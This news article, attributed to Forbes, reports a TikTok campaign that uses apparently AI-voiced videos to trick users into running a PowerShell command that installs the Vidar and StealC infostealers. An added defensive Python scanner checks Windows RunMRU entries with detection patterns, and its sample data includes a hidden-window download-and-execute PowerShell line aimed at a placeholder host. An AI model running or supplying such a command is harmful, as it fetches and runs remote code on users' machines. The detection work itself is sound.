No, That TikTok Video Won't Help You Get Free Software

Published 20 hours ago · 3 minute read

TikTok users are being warned to look out for videos—likely deepfakes—showing them how to activate Windows and Microsoft Office, or to enable premium features in apps such as Spotify or CapCut.

The similarity of the videos suggests that they were likely created through automation, said Trend Micro, which uncovered the campaign, while the voice issuing instructions also appears to be AI-generated.

Automation makes the videos particularly dangerous: it allows extremely large-scale operations and lets attackers target different categories of users with different tactics.

The videos instruct users to open the Run dialog on Windows and then execute a PowerShell command that, they're told, will activate the software or extra features for free.

In reality, though, the command downloads a malicious script that distributes the Vidar and StealC information-stealing malware. Vidar can then take screenshots of the victim's desktop and steal credentials, credit cards, and cryptocurrency wallets, while StealC can also harvest a broad range of sensitive information.
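Because the command is typed into the Run dialog, Windows keeps it in the user's RunMRU registry key, which gives defenders something to check after the fact. The sketch below is an added example, not code from Forbes or Trend Micro: it assumes the key has been exported as a name-to-value mapping, and the sample commands, placeholder hosts and keyword lists are constructed for illustration.

```python
import re

# Commands typed into the Run dialog are kept per user under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, one value per
# entry, each ending in a "\1" terminator; MRUList gives newest-first order.
POWERSHELL = re.compile(r"\b(powershell|pwsh)(\.exe)?\b", re.I)
FETCH = re.compile(r"\b(iwr|irm|curl|wget|invoke-webrequest|invoke-restmethod|"
                   r"downloadstring|downloadfile|start-bitstransfer)\b", re.I)
EXECUTE = re.compile(r"\b(iex|invoke-expression)\b|\|\s*(powershell|pwsh)\b", re.I)
HIDDEN = re.compile(r"-(w|windowstyle)\s+h", re.I)
URL = re.compile(r"https?://[^\s'\")]+", re.I)

# Constructed sample of an exported RunMRU key (hosts are placeholders).
SAMPLE_RUNMRU = {
    "a": "cmd\\1",
    "b": 'powershell -w hidden -c "iex (irm https://activate.example.invalid/office)"\\1',
    "c": "powershell -NoProfile -Command Get-ComputerInfo\\1",
    "d": "powershell iwr https://files.example.invalid/tool.zip -OutFile tool.zip\\1",
    "MRUList": "bdca",
}


def classify(command):
    """Return (severity, reasons) for one Run-dialog command string."""
    cmd = command[:-2] if command.endswith("\\1") else command
    if not POWERSHELL.search(cmd):
        return "ok", []
    checks = [(FETCH, "fetches remote content"), (EXECUTE, "executes a string as code"),
              (HIDDEN, "hides its window")]
    reasons = [label for pattern, label in checks if pattern.search(cmd)]
    url = URL.search(cmd)
    if url:
        reasons.append("contains URL " + url.group(0))
    # Fetch followed by execution matches a command that downloads a script and runs it.
    if FETCH.search(cmd) and EXECUTE.search(cmd):
        return "high", reasons
    return ("review" if reasons else "ok"), reasons


def scan(runmru):
    """Return [(value_name, severity, reasons)] for flagged entries, newest first."""
    names = [n for n in runmru.get("MRUList", "") if n in runmru]
    findings = []
    for name in names:
        severity, reasons = classify(runmru[name])
        if severity != "ok":
            findings.append((name, severity, reasons))
    return findings
```

Calling `scan(SAMPLE_RUNMRU)` flags entry `b` as high and entry `d` for review; the same `classify` function can be pointed at command lines from process-creation logs.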

"In this campaign, attackers are using TikTok videos to verbally instruct users into executing malicious commands on their own systems. The social engineering occurs within the video itself, rather than through detectable code or scripts", Trend Micro warned.

"There is no malicious code present on the platform for security solutions to analyze or block. All actionable content is delivered visually and aurally. Threat actors do this to attempt to evade existing detection mechanisms, making it harder for defenders to detect and disrupt these campaigns."

The researchers found a number of accounts posting the videos, including @gitallowed, @zane.houghton, @allaivo2, @sysglow.wow, @alexfixpc, and @digitaldreams771. One video reached more than half a million views, with over 20,000 likes and more than 100 comments.

"The vast user base and algorithmic reach of social media platforms provide an ideal delivery mechanism for threat actors", said Trend Micro threats analyst Junestherry Dela Cruz.

"For attackers, this means broad distribution without the logistical burden of maintaining an infrastructure. The use of AI-generated content also elevates these kinds of attacks from isolated incidents to a highly scalable operation, as these videos can be rapidly produced and tailored to target different user segments."

The popularity of TikTok means that scams are rife, with fake giveaways, fake celebrity and influencer accounts, romance scams and more. The company regularly takes down scam accounts and warns users, asking them to report any scams that they find. It has taken down the accounts reported by Trend Micro.

"Users should be encouraged to scrutinize unsolicited technical instructions, verify the legitimacy of video sources, and report suspicious content, whether on social media, messaging apps, or email", Trend Micro warned. "After all, if an offer seems too good to be true, it probably is."

Origin: Forbes